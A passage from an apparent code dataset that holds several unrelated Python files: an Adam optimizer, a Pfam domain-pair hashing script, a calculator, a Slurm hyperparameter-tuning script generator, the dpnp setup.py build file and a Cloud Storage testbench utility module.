v_corrected[\"db\" + str(l + 1)] = self.v[\"db\" + str(l + 1)] / (1 - np.power(self.beta1, self.t))\n\n # Moving average of the squared gradients. Inputs: \"s, grads, beta2\". Output: \"s\".\n self.s[\"dW\" + str(l + 1)] = self.beta2 * self.s[\"dW\" + str(l + 1)] + (1 - self.beta2) * np.power(grads['dW' + str(l + 1)], 2)\n self.s[\"db\" + str(l + 1)] = self.beta2 * self.s[\"db\" + str(l + 1)] + (1 - self.beta2) * np.power(grads['db' + str(l + 1)], 2)\n\n # Compute bias-corrected second raw moment estimate. Inputs: \"s, beta2, t\". 
Output: \"s_corrected\".\n s_corrected[\"dW\" + str(l + 1)] = self.s[\"dW\" + str(l + 1)] / (1 - np.power(self.beta2, self.t))\n s_corrected[\"db\" + str(l + 1)] = self.s[\"db\" + str(l + 1)] / (1 - np.power(self.beta2, self.t))\n\n # Update parameters. Inputs: \"parameters, learning_rate, v_corrected, s_corrected, epsilon\". Output: \"parameters\".\n parameters[\"W\" + str(l + 1)] = parameters[\"W\" + str(l + 1)] - learning_rate * v_corrected[\"dW\" + str(l + 1)] / np.sqrt(self.s[\"dW\" + str(l + 1)] + self.epsilon)\n parameters[\"b\" + str(l + 1)] = parameters[\"b\" + str(l + 1)] - learning_rate * v_corrected[\"db\" + str(l + 1)] / np.sqrt(self.s[\"db\" + str(l + 1)] + self.epsilon)\n\n return parameters\n \n def __eq__(self, compare): \n if(compare == \"adam\"): \n return True\n else:\n return False","sub_path":"zeronn/optimizers/.ipynb_checkpoints/AdamOptimizer-checkpoint.py","file_name":"AdamOptimizer-checkpoint.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"163822796","text":"import numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\nimport pickle\nimport datetime\nimport csv\nimport os\nimport math\n\n# SETUP\npf_loc = '../../data/pfams/Pfam-A.regions.tsv'\nout_loc = '/'.join(pf_loc.split('/')[0:-1]) + '/'\ndigits = 6\nbase = 16\nalphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\nordermag = np.array([base**i for i in range(digits)])\ncharkey = dict(zip(alphabet, range(len(alphabet))))\nhash2 = lambda x: int(np.dot(np.array([charkey[c] for c in x[2][:digits]]), ordermag))\n\nname_digits = 4 # digits in name; 5 for pfams, 4 for clans\n# power must be less than (but shouldn't be by much) number of generated digits, math.log(10**name_digits, 2)*2\n# previously, chosen 24 for 5 digits (33 max), 20 for 4 digits (26 max)\nshsize = 2**20\nndigit = int(round(math.log(shsize, 2)))\ndef hashp(x):\n bstr = [bin(int(x[i][-name_digits:], base=10))[2:] for i in range(len(x))]\n bstrp = ['0'*(max([int(math.ceil(float(ndigit)/float(len(x)))) - len(el), 0])) + el for el in bstr]\n hp = int(''.join([''.join([bstrp[i][-j] for i in range(len(x))])\n for j in range(1, 1+int(math.ceil(ndigit/float(len(x)))))])[0:ndigit], base=2)\n return hp\n\nthsnow = datetime.datetime.now()\ntimestr = ( str(thsnow.month) + '-' + str(thsnow.day) + '-' +\n str(thsnow.year) + '_' + str(thsnow.hour) + 'h' + str(thsnow.minute) + 'm')\n\n\nindex_f = open('../../data/pfams/clan_indices_11-11-2016_12h24m.pkl', 'rb')\nprot_names = pickle.load(index_f)\nprot_clans = pickle.load(index_f)\nprot_dict = pickle.load(index_f)\nclan_list = pickle.load(index_f)\nclan_dict = pickle.load(index_f)\nindex_f.close()\n\n## summary statistics 1:\n# domains per protein\ndom_per_prot = [len(prot) for prot in prot_clans]\n\n# unique domains per protein\nudom_per_prot = [len(set([pdet[0] for pdet in prot])) for prot in prot_clans]\n\n# pfam coverage -> gaps between protein domains (can't get full length)\npf_gaps = []\nfor prot in prot_clans:\n for domi in range(len(prot)-1):\n pf_gaps.append(prot[domi+1][1] - prot[domi][2])\n\n# decision entropy\ndec_entropy = np.zeros(len(prot_clans))\nfor proti, prot in enumerate(prot_clans):\n if len(prot) < 2:\n continue\n pfvec = [pdet[0] for pdet in prot]\n uset = [el for el in set(pfvec)]\n umult = [sum([pfi == pfj for pfj in pfvec]) for pfi in uset]\n for pfi_i, pfi in enumerate(uset):\n nextvec = []\n for pfj_i, pfj in enumerate(pfvec[:-1]):\n if pfj == pfi:\n 
nextvec.append(pfvec[pfj_i+1])\n        unext = [el for el in set(nextvec)]\n        unextpi = [sum([pfi == pfj for pfj in nextvec])/float(len(nextvec)) for pfi in unext]\n        dec_entropy[proti] += sum([-math.log(um)*um for um in unextpi])*umult[pfi_i]\n\nout_summary1 = open(out_loc + 'summary_stats1_' + timestr + '.pkl', 'wb')\npickle.dump(dom_per_prot, out_summary1)\npickle.dump(udom_per_prot, out_summary1)\npickle.dump(pf_gaps, out_summary1)\npickle.dump(dec_entropy, out_summary1)\npickle.dump(prot_names, out_summary1)\nout_summary1.close()\n\n# step 8: hash adjoining clans\nnhash = 2\nsethash = [[] for si in range(shsize)]\nhashloc = [[] for si in range(shsize)]\nfor proti, prot in enumerate(prot_clans):\n    for domi in range(len(prot)-1):\n        thsrng = range(domi, domi + nhash)\n        doml = [prot[hi][0] for hi in thsrng]\n        skey = doml #[int(x[-name_digits:]) for x in doml]\n\n        # sort, to make sure all orders get mapped to same place\n        sdomi = [x for (y,x) in sorted(zip(skey, thsrng))]\n        sdoml = [x for (y,x) in sorted(zip(skey, doml))]\n        hashi = hashp(sdoml)\n\n        if len(hashloc[hashi]) == 0:\n            hashloc[hashi] = [sdoml]\n            sethash[hashi] = [[[proti, sdomi]]]\n        else:\n            found = False\n            for subi, sub in enumerate(hashloc[hashi]):\n                if sub == sdoml:\n                    sethash[hashi][subi].append([proti, sdomi])\n                    found = True\n                    break\n            if found == False:\n                hashloc[hashi].append(sdoml)\n                sethash[hashi].append([[proti, sdomi]])\n\n# compile pfam pairs list from hash table\npfpairs = []\npfpairlocs = []\npairmap = [[] for el in clan_list]\ncount = 0\nfor hsi in range(shsize):\n    for hsj in range(len(hashloc[hsi])):\n        pfpairs.append(hashloc[hsi][hsj])\n        pfpairlocs.append(sethash[hsi][hsj])\n        pairmap[clan_dict[hashloc[hsi][hsj][0]]].append(count)\n        if hashloc[hsi][hsj][0] != hashloc[hsi][hsj][1]:\n            pairmap[clan_dict[hashloc[hsi][hsj][1]]].append(count)\n        count += 1\n\nout_pairs = open(out_loc + 'pfam_pairs_' + timestr + '.pkl', 'wb')\npickle.dump(pfpairs, out_pairs)\npickle.dump(pfpairlocs, out_pairs)\npickle.dump(pairmap, out_pairs)\nout_pairs.close()\n\n## summary statistics 2:\n# count incidence of adjacent pairs of domains in either order\nordercounts = np.zeros([len(pfpairs), 2])\nfor pfi in range(len(pfpairlocs)):\n    for loci in range(len(pfpairlocs[pfi])):\n        if pfpairlocs[pfi][loci][1][1] > pfpairlocs[pfi][loci][1][0]:\n            ordercounts[pfi][0] += 1\n        else:\n            ordercounts[pfi][1] += 1\n\nout_summary2 = open(out_loc + 'summary_stats2_' + timestr + '.pkl', 'wb')\npickle.dump(ordercounts, out_summary2)\npickle.dump(pfpairs, out_summary2)\nout_summary2.close()\n","sub_path":"PfamLogic/DomainParse_summary2.py","file_name":"DomainParse_summary2.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"369714226","text":"import calculations as calc  # alias the module so the calc.* calls below resolve\na,b = input().split() #input 2 no.s\nch = int(input()) # input choice for calculator\na=int(a)\nb=int(b)\nif(ch==1):\n    print(calc.sum(a,b))\nif(ch==2):\n    print(calc.subtract(a,b))\nif(ch==3):\n    print(calc.multiply(a,b))\nif(ch==4):\n    print(int(calc.divide(a,b)))\n","sub_path":"Module and Package/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"68888815","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport yaml\nimport os\nimport sys\nimport itertools\nimport numpy as np\n\n# add this line to avoid weird characters in yaml files\nyaml.Dumper.ignore_aliases = lambda *args : 
True\n\n\ndef grouper(iterable, n):\n    args = [iter(iterable)] * n\n    return ([e for e in t if e is not None] for t in itertools.zip_longest(*args))\n\n\ndef gen_slurm_script(command, config_dir, experiment_id_list, dataset_name, gpus, dataset, model_name):\n    n_workers = gpus\n    cmd_sequence_list = []\n    experiment_id_list = [exp for exp in experiment_id_list if model_name in exp]\n    for idx, exp_list in enumerate(np.array_split(experiment_id_list, n_workers)):\n        if len(exp_list) == 0 or (\"Base\" in exp_list and len(exp_list)==1): continue\n        cmd_list = []\n        for experiment_id in exp_list:\n            if experiment_id == \"Base\": continue\n            cmd = 'srun -p gpu_24h --gres=gpu:1 python_slurm {} -dataset {} -config {} -exp {} -gpu {}'\\\n                .format(command, dataset, config_dir+\"/model_config.yaml\", experiment_id, 0)\n#             cmd = 'python {} -config {} -exp {} -gpu {}'\\\n#                 .format(command, config_dir+\"/model_config.yaml\", experiment_id, 0)\n\n            cmd_list.append(cmd)\n        cmd_sequence = ' && '.join(cmd_list)\n        cmd_sequence += ' &'\n        cmd_sequence_list.append(cmd_sequence)\n        print(cmd_sequence)\n    print(\"Total : {}\".format(len(experiment_id_list)))\n    \n    np.random.shuffle(cmd_sequence_list)\n\n    with open(\"./slurm_script_{}_{}.sh\".format(model_name, dataset_name), \"w\") as fw:\n        fw.write(\"#!/bin/bash\\n\")\n        fw.write(\"#SBATCH --gres=gpu:{}\\n\".format(n_workers))\n        fw.write(\"#SBATCH --cpus-per-task={}\\n\".format(n_workers))\n        fw.write(\"#SBATCH -p gpu_24h\\n\")\n        for cmd in cmd_sequence_list:\n            fw.write(cmd + \"\\n\")\n    \ndef product_params(tune_dict, model_dict, experiment_id):\n    model_dict = {k: tune_dict[k] if k in tune_dict else [v] for k, v in model_dict.items()}\n    model_para_keys = list(model_dict.keys())\n    model_param_combs = dict()\n    for idx, values in enumerate(itertools.product(*map(model_dict.get, model_para_keys))):\n        param_dict = dict(zip(model_para_keys, values))\n        model_id = experiment_id + '_{:03d}'.format(idx + 1)\n#         param_dict[\"model_id\"] = model_id\n        model_param_combs[model_id] = param_dict\n    return model_param_combs\n\ndef enumerate_params(config_file, experiment_id):\n    with open(config_file, 'r') as cfg:\n        config_dict = yaml.safe_load(cfg)  # safe_load: plain data only, no arbitrary YAML tags\n\n    config_dir = config_file[:-len('.yaml')] + \"_\" + experiment_id  # slice off the literal '.yaml' suffix; str.rstrip strips characters, not a substring\n    if not os.path.exists(config_dir):\n        os.makedirs(config_dir)\n\n    # model params\n    model_dict = config_dict[experiment_id]\n    \n    # base\n    base = config_dict[\"Base\"]\n    \n    # tuning space\n\n    # enumerate model para combinations\n    if model_dict[\"net\"] in [\"distill\", \"rocket\"]:\n        tune_dict = config_dict['tuner_space'][model_dict[\"net\"]]\n        teacher_dict = tune_dict.get(\"teacher\", {})\n        student_dict = tune_dict.get(\"student\", {})\n        others_dict = tune_dict.get(\"others\", {})\n        teachers = product_params(teacher_dict, model_dict[\"teacher\"], \"T\")\n        students = product_params(student_dict, model_dict[\"student\"], \"S\")\n        tmp_dict = {k:v for k,v in model_dict.items() if k not in [\"teacher\", \"student\"]}\n        others = product_params(others_dict, tmp_dict , \"meta\")\n        res = list(itertools.product(teachers.keys(), students.keys(), others.keys()))\n        model_param_combs = {}\n        for idx, (t_id, s_id, meta_id) in enumerate(res):\n            comb = {\"teacher\": teachers[t_id],\n                    \"student\": students[s_id], \n                    **others[meta_id]} \n            model_id = experiment_id + '_{:03d}'.format(idx + 1)\n            model_param_combs[model_id] = comb\n    elif model_dict[\"net\"] in [\"ensemble\"]:\n        tune_dict = config_dict['tuner_space'][model_dict[\"net\"]]\n        student_dict = tune_dict[\"student\"]\n        others_dict = tune_dict[\"others\"]\n        
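# expand the student grid and the remaining (meta) keys independently, then
        # cross them with itertools.product below to enumerate every ensemble id
        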
students = product_params(student_dict, model_dict[\"student\"], \"S\")\n tmp_dict = {k:v for k,v in model_dict.items() if k not in [\"student\"]}\n others = product_params(others_dict, tmp_dict , \"meta\")\n res = list(itertools.product(students.keys(), others.keys()))\n model_param_combs = {}\n for idx, (s_id, meta_id) in enumerate(res):\n comb = {\"student\": students[s_id],\n **others[meta_id]}\n model_id = experiment_id + '_{:03d}'.format(idx + 1)\n model_param_combs[model_id] = comb\n else:\n tune_dict = {}\n if 'common' in config_dict['tuner_space']:\n tune_dict.update(config_dict['tuner_space']['common'])\n if model_dict[\"net\"] in config_dict['tuner_space']:\n tune_dict.update(config_dict['tuner_space'][model_dict[\"net\"]])\n model_param_combs = product_params(tune_dict, model_dict, experiment_id)\n\n if model_dict[\"net\"] in [\"ensemble\", \"gate\"]:\n for teacher_name in model_dict[\"teacher_name_list\"]:\n try:\n model_param_combs[teacher_name] = config_dict[teacher_name]\n except:\n print(\"{} missed\".format(teacher_name))\n \n # dump model para combinations to config file\n model_param_combs[\"Base\"] = base\n with open(os.path.join(config_dir, 'model_config.yaml'), 'w') as fw:\n yaml.dump(model_param_combs, fw, default_flow_style=None, indent=4)\n\n save_dict = {\"tune_space\": tune_dict, experiment_id: model_dict}\n with open(os.path.join(config_dir, 'tune_space.yaml'), 'w') as fw:\n yaml.dump(save_dict, fw, default_flow_style=None, indent=4)\n return config_dir, list(model_param_combs.keys())\n\n# wide_deep DeepFM DNN xDeepFM DCN\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-command', type=str, default='benchmark.py', help='The benchmark command.')\n parser.add_argument('-exp', type=str, default='DAN', help='The base config setting.')\n parser.add_argument('-gpus', type=int, default=1, help='The list of indices of gpus, -1 for cpu.')\n parser.add_argument('-dataset', type=str, default='avazu', help='Dataset to run.')\n args = vars(parser.parse_args())\n gpus = args['gpus']\n command = args['command']\n dataset_name = args[\"dataset\"]\n config_file = '../config/{}/{}_tune.yaml'.format(dataset_name, dataset_name)\n \n # generate parameter space combinations\n config_dir, experiment_id_list = enumerate_params(config_file, args['exp'])\n gen_slurm_script(command, config_dir, experiment_id_list, dataset_name, gpus, args['dataset'], args[\"exp\"])\n \n \n# enumerate_params(\"../config/avazu_tune.yaml\", \"graph_01\")\n# gen_slurm_script(\"train.py\", )\n ","sub_path":"benchmark/auto_tuner.py","file_name":"auto_tuner.py","file_ext":"py","file_size_in_byte":6858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"141084686","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# *****************************************************************************\n# Copyright (c) 2016-2020, Intel Corporation\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# - Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# - Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND 
CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF\n# THE POSSIBILITY OF SUCH DAMAGE.\n# *****************************************************************************\n\n\"\"\" NumPy is the fundamental package for array computing with Python.\n\nIt provides:\n\n- a powerful N-dimensional array object\n- sophisticated (broadcasting) functions\n- tools for integrating C/C++ and Fortran code\n- useful linear algebra, Fourier transform, and random number capabilities\n- and much more\n\n\"\"\"\n\nimport importlib.machinery as imm # Python 3 is required\nimport sys\nimport os\nimport numpy\n\nfrom setuptools import setup, Extension\nfrom Cython.Build import cythonize\nfrom Cython.Compiler import Options as cython_options\n\nfrom utils.command_style import source_style\nfrom utils.command_clean import source_clean\nfrom utils.command_build_clib import custom_build_clib\n\n\n\"\"\"\nPython version check\n\"\"\"\nif sys.version_info[:2] < (3, 6):\n raise RuntimeError(\"Intel NumPy: Python version >= 3.5 required.\")\n\n\n\"\"\"\nGet the project version\n\"\"\"\nthefile_path = os.path.abspath(os.path.dirname(__file__))\nversion_mod = imm.SourceFileLoader('version', os.path.join(thefile_path, 'dpnp', '_version.py')).load_module()\n__version__ = version_mod.__version__\n\n\n\"\"\"\nSet project auxilary data like readme and licence files\n\"\"\"\nwith open('README.md') as f:\n __readme_file__ = f.read()\n\nwith open('LICENSE.txt') as f:\n __license_file__ = f.read()\n\nCLASSIFIERS = \"\"\"\\\nDevelopment Status :: 0 - Alpha\nIntended Audience :: Science/Research\nIntended Audience :: Developers\nLicense :: OSI Approved\nProgramming Language :: C\nProgramming Language :: Python\nProgramming Language :: Python :: 3\nProgramming Language :: Python :: 3.6\nProgramming Language :: Python :: 3.7\nProgramming Language :: Python :: 3.8\nProgramming Language :: Python :: Implementation :: CPython\nTopic :: Software Development\nTopic :: Scientific/Engineering\nOperating System :: Microsoft :: Windows\nOperating System :: POSIX\nOperating System :: Unix\nOperating System :: MacOS\n\"\"\"\n\nIS_WIN = False\nIS_MAC = False\nIS_LIN = False\n\nif 'linux' in sys.platform:\n IS_LIN = True\nelif sys.platform == 'darwin':\n IS_MAC = True\nelif sys.platform in ['win32', 'cygwin']:\n IS_WIN = True\nelse:\n raise EnvironmentError(\"Intel NumPy: \" + sys.platform + \" not supported\")\n\n\"\"\"\nSet compiler for the project\n\"\"\"\n# default variables (for Linux)\n_project_compiler = \"clang++\"\n_project_linker = \"clang++\"\n_project_cmplr_flag_sycl_devel = [\"-fsycl-device-code-split=per_kernel\"]\n_project_cmplr_flag_sycl = [\"-fsycl\"]\n_project_cmplr_flag_compatibility = [\"-Wl,--enable-new-dtags\", \"-fPIC\"]\n_project_cmplr_flag_lib = []\n_project_cmplr_macro = []\n_project_sycl_queue_control_macro = [(\"DPNP_LOCAL_QUEUE\", \"1\")]\n_project_rpath = [\"$ORIGIN\"]\n_dpctrl_include 
= []\n_dpctrl_libpath = []\n_dpctrl_lib = []\n\n\ntry:\n \"\"\"\n Detect external SYCL queue handling library\n \"\"\"\n import dpctrl\n\n # TODO this will not work with no Conda environment\n _conda_root = os.environ.get('CONDA_PREFIX', \"conda_include_error\")\n _dpctrl_include += [os.path.join(_conda_root, 'include')]\n _dpctrl_libpath += [os.path.join(_conda_root, 'lib')]\n _dpctrl_lib += [\"dpctrlsyclinterface\"]\nexcept ImportError:\n \"\"\"\n Set local SYCL queue handler\n \"\"\"\n _project_cmplr_macro += _project_sycl_queue_control_macro\n\n\n# other OS specific\nif IS_WIN:\n _project_compiler = \"dpcpp-cl\" # \"clang-cl\"\n _project_linker = \"lld-link\" # \"dpcpp-cl\"\n _project_cmplr_flag_sycl = []\n _project_cmplr_flag_compatibility = []\n _project_cmplr_flag_lib = ['/DLL']\n _project_cmplr_macro = [(\"_WIN\", \"1\"), (\"MKL_ILP64\", \"1\")]\n _project_rpath = []\n # TODO obtain setuptools.compiler.buildline options line and replace /MD with /MT instead adding it\n os.environ[\"CFLAGS\"] = \"/MT\"\n\n\ntry:\n \"\"\"\n set environment variables to control setuptools build procedure\n \"\"\"\n # check if we have preset variables in environment\n os.environ[\"CC\"] == _project_compiler\n os.environ[\"CXX\"] == _project_compiler\n os.environ[\"LD\"] == _project_linker\nexcept KeyError:\n # set variables if not presented in environment\n os.environ[\"CC\"] = _project_compiler\n os.environ[\"CXX\"] = _project_compiler\n os.environ[\"LD\"] = _project_linker\n\n\n\"\"\"\nGet the project build type\n\"\"\"\n__dpnp_debug__ = os.environ.get('DEBUG', None)\nif __dpnp_debug__ is not None:\n _project_cmplr_flag_sycl += _project_cmplr_flag_sycl_devel\n\n\n\"\"\"\nSearch and set MKL environemnt\n\"\"\"\n_mkl_rpath = []\n_cmplr_rpath = []\n_omp_rpath = []\n\n\n_mkl_root = os.environ.get('MKLROOT', None)\nif _mkl_root is None:\n raise EnvironmentError(\"Intel NumPy: Please install Intel OneAPI environment. MKLROOT is empty\")\n_mkl_include = [os.path.join(_mkl_root, 'include')]\n_mkl_libs = ['mkl_rt', 'mkl_sycl', 'mkl_intel_ilp64', 'mkl_tbb_thread', 'mkl_core', 'tbb', 'iomp5']\n\n_mkl_libpath = [os.path.join(_mkl_root, 'lib', 'intel64')]\nif IS_LIN:\n _mkl_rpath = _mkl_libpath\nelif IS_WIN:\n _mkl_libs = [\"mkl_sycl\", \"mkl_intel_ilp64\", \"mkl_tbb_thread\", \"mkl_core\", \"sycl\", \"OpenCL\", \"tbb\"]\n\n_cmplr_root = os.environ.get('ONEAPI_ROOT', None)\nif _cmplr_root is None:\n raise EnvironmentError(\"Please install Intel OneAPI environment. 
ONEAPI_ROOT is empty\")\n\nif IS_LIN:\n _cmplr_libpath = [os.path.join(_cmplr_root, 'compiler', 'latest', 'linux', 'lib')]\n _omp_libpath = [os.path.join(_cmplr_root, 'compiler', 'latest', 'linux', 'compiler', 'lib', 'intel64')]\n _cmplr_rpath = _cmplr_libpath\n _omp_rpath = _omp_libpath\nelif IS_WIN:\n _cmplr_libpath = [os.path.join(_cmplr_root, 'compiler', 'latest', 'windows', 'lib')]\n _omp_libpath = [os.path.join(_cmplr_root, 'compiler', 'latest', 'windows', 'compiler', 'lib', 'intel64_win')]\n\n\n\"\"\"\nFinal set of arguments for extentions\n\"\"\"\n_project_extra_link_args = _project_cmplr_flag_compatibility + [\"-Wl,-rpath,\" + x for x in _project_rpath]\n_project_dir = os.path.dirname(os.path.abspath(__file__))\n_project_main_module_dir = [os.path.join(_project_dir, \"dpnp\")]\n_project_backend_dir = [os.path.join(_project_dir, \"dpnp\", \"backend\")]\n\n\n\"\"\"\nExtra defined commands for the build system\n\n>$ python ./setup.py --help-commands\n\n>$ python ./setup.py style\n>$ python ./setup.py style -a\n>$ python ./setup.py clean\n\nTODO: spell check, valgrind, code coverage\n\"\"\"\ndpnp_build_commands = {'style': source_style,\n 'build_clib': custom_build_clib,\n 'clean': source_clean\n }\n\n\n\"\"\"\nThe project modules description\n\"\"\"\ndpnp_backend_c = [\n [\"dpnp_backend_c\",\n {\n \"sources\": [\n \"dpnp/backend/backend_iface_fptr.cpp\",\n \"dpnp/backend/custom_kernels.cpp\",\n \"dpnp/backend/custom_kernels_elemwise.cpp\",\n \"dpnp/backend/custom_kernels_manipulation.cpp\",\n \"dpnp/backend/custom_kernels_reduction.cpp\",\n \"dpnp/backend/custom_kernels_searching.cpp\",\n \"dpnp/backend/custom_kernels_sorting.cpp\",\n \"dpnp/backend/custom_kernels_statistics.cpp\",\n \"dpnp/backend/memory_sycl.cpp\",\n \"dpnp/backend/mkl_wrap_blas1.cpp\",\n \"dpnp/backend/mkl_wrap_blas3.cpp\",\n \"dpnp/backend/mkl_wrap_lapack.cpp\",\n \"dpnp/backend/mkl_wrap_rng.cpp\",\n \"dpnp/backend/queue_sycl.cpp\"\n ],\n \"include_dirs\": _mkl_include + _project_backend_dir + _dpctrl_include,\n \"library_dirs\": _mkl_libpath + _omp_libpath + _dpctrl_libpath,\n \"runtime_library_dirs\": _project_rpath + _mkl_rpath + _cmplr_rpath + _omp_rpath + _dpctrl_libpath,\n \"extra_preargs\": _project_cmplr_flag_sycl,\n \"extra_link_postargs\": _project_cmplr_flag_compatibility + _project_cmplr_flag_lib,\n \"libraries\": _mkl_libs + _dpctrl_lib,\n \"macros\": _project_cmplr_macro,\n \"language\": \"c++\"\n }\n ]\n]\n\ndpnp_backend = Extension(\n name=\"dpnp.backend\",\n sources=[\"dpnp/backend.pyx\"],\n libraries=[],\n include_dirs=[numpy.get_include()] + _project_backend_dir,\n extra_compile_args=[],\n extra_link_args=_project_extra_link_args,\n define_macros=[(\"NPY_NO_DEPRECATED_API\", \"NPY_1_7_API_VERSION\")],\n language=\"c++\"\n)\n\ndpnp_dparray = Extension(\n name=\"dpnp.dparray\",\n sources=[\"dpnp/dparray.pyx\"],\n libraries=[],\n include_dirs=[numpy.get_include()] + _project_backend_dir,\n extra_compile_args=[],\n extra_link_args=_project_extra_link_args,\n define_macros=[(\"NPY_NO_DEPRECATED_API\", \"NPY_1_7_API_VERSION\")],\n language=\"c++\"\n)\n\ndpnp_random = Extension(\n name=\"dpnp.random._random\",\n sources=[\"dpnp/random/_random.pyx\"],\n include_dirs=[numpy.get_include()] + _project_backend_dir,\n extra_link_args=_project_extra_link_args,\n define_macros=[(\"NPY_NO_DEPRECATED_API\", \"NPY_1_7_API_VERSION\")],\n language=\"c++\"\n)\n\ndpnp_utils = Extension(\n name=\"dpnp.dpnp_utils\",\n sources=[\"dpnp/dpnp_utils.pyx\"],\n include_dirs=[numpy.get_include()] + _project_backend_dir,\n 
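# all five Cython extensions share the same rpath-carrying link flags and pin
    # the NumPy C API via the NPY_NO_DEPRECATED_API macro below
    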
extra_compile_args=[],\n extra_link_args=_project_extra_link_args,\n define_macros=[(\"NPY_NO_DEPRECATED_API\", \"NPY_1_7_API_VERSION\")],\n language=\"c++\"\n)\n\ndpnp_linalg = Extension(\n name=\"dpnp.linalg.linalg\",\n sources=[\"dpnp/linalg/linalg.pyx\"],\n include_dirs=[numpy.get_include()] + _project_backend_dir,\n extra_link_args=_project_extra_link_args,\n define_macros=[(\"NPY_NO_DEPRECATED_API\", \"NPY_1_7_API_VERSION\")],\n language=\"c++\"\n)\n\ncython_options.docstrings = True\ncython_options.embed_pos_in_docstring = True\ncython_options.warning_errors = True\n\ndpnp_cython_mods = cythonize([dpnp_backend, dpnp_dparray, dpnp_random, dpnp_utils, dpnp_linalg],\n compiler_directives={\"language_level\": sys.version_info[0],\n \"warn.unused\": False,\n \"warn.unused_result\": False,\n \"warn.maybe_uninitialized\": False,\n \"warn.undeclared\": False,\n \"boundscheck\": True,\n \"linetrace\": True\n },\n gdb_debug=False,\n build_dir=\"build_cython\",\n annotate=False,\n quiet=False)\n\nsetup(name=\"DPNP\",\n version=__version__,\n description=\"Subclass of numpy.ndarray that uses mkl_malloc\",\n long_description=__readme_file__,\n author=\"Intel Corporation\",\n author_email=\"Intel Corporation\",\n maintainer=\"Intel Corp.\",\n maintainer_email=\"scripting@intel.com\",\n url=\"http://github.com/IntelPython/mkl_array\",\n download_url=\"http://github.com/IntelPython/mkl_array\",\n license=__license_file__,\n classifiers=[_f for _f in CLASSIFIERS.split('\\n') if _f],\n keywords=\"python numeric algebra blas\",\n platforms=[\"Linux\", \"Windows\", \"Mac OS-X\"],\n test_suite=\"pytest\",\n python_requires=\">=3.6\",\n install_requires=[\"numpy>=1.15\"],\n setup_requires=[\"numpy>=1.15\"],\n tests_require=[\"numpy>=1.15\"],\n ext_modules=dpnp_cython_mods,\n cmdclass=dpnp_build_commands,\n packages=['dpnp',\n 'dpnp.random',\n 'dpnp.linalg',\n ],\n package_data={'dpnp': ['libdpnp_backend_c.so']},\n include_package_data=True,\n\n # this is needed for 'build' command to automatically call 'build_clib'\n # it attach the library to all extensions (it is not needed)\n libraries=dpnp_backend_c\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":13118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"577692099","text":"# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Common utils\"\"\"\n\nimport re\nimport scalpl\nimport types\n\nre_remove_index = re.compile(r\"\\[\\d+\\]+|^[0-9]+\")\n\n# === STR === #\n\n\nre_snake_case = re.compile(r\"(? 
[\"kind\", \"items.id\", \"items.name\"]\n res = []\n for i, c in enumerate(fields):\n if c != \" \" and c != \")\":\n if c == \"/\":\n res.append(\".\")\n else:\n res.append(c)\n elif c == \")\":\n childrens_fields = []\n tmp_field = []\n while res:\n if res[-1] != \",\" and res[-1] != \"(\":\n tmp_field.append(res.pop())\n else:\n childrens_fields.append(tmp_field)\n tmp_field = []\n if res.pop() == \"(\":\n break\n parent_field = []\n while res and res[-1] != \",\" and res[-1] != \"(\":\n parent_field.append(res.pop())\n for i, field in enumerate(childrens_fields):\n res.extend(parent_field[::-1])\n res.append(\".\")\n while field:\n res.append(field.pop())\n if i < len(childrens_fields) - 1:\n res.append(\",\")\n return \"\".join(res).split(\",\")\n\n\ndef filter_response_rest(response, projection, fields):\n if fields is not None:\n fields = parse_fields(fields)\n deleted_keys = set()\n for key in nested_key(response):\n simplfied_key = remove_index(key)\n maybe_delete = True\n if projection == \"noAcl\":\n maybe_delete = False\n if simplfied_key.startswith(\"owner\"):\n deleted_keys.add(\"owner\")\n elif simplfied_key.startswith(\"items.owner\"):\n 